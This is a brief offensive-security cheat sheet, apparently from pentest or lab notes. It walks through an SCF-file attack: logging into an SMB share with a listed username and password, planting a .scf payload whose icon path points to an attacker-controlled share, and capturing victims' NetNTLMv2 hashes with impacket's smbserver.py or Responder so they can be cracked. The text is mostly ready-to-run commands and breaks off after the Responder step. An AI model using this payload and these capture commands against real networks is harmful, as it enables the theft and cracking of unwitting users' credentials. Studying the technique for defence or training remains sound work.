# SCF Files
Imagine we have write permission to a shared folder, we could use it to save a .scf file, trick a user to access it and obtain its NetNTLMv2 hash. If its password is weak, we could obtain the plain text of it.
## Access to Shared Folder
```bash
smbclient //10.10.10.10/payroll-2024 -U 'freed-om-corp.com\carlos.villamizar%NastAsya4475'
```
## Create SCF file
```powershell
[Shell]
Command=2
IconFile=\\10.10.10.20\mycompartida\quepasomirey.ico
[Taskbar]
Command=ToggleDesktop
```
## Upload SCF file to Shared Folder
## Serve the attacker Shared Folder
```bash
python3 /opt/impacket/examples/smbserver.py mycompartida $(pwd) -smb2support
```
And now we need to wait for an interaction with the payroll-2024 shared folder.
Waiting... ANDD if someone is interacting with the folder we will receive a NetNTLMv2 hash in our mycompartida shared folder.
## Or using Responder.py
```bash
sudo python3 Responder.py -I eth0
```
Wait and once we detect an interaction with the folder:
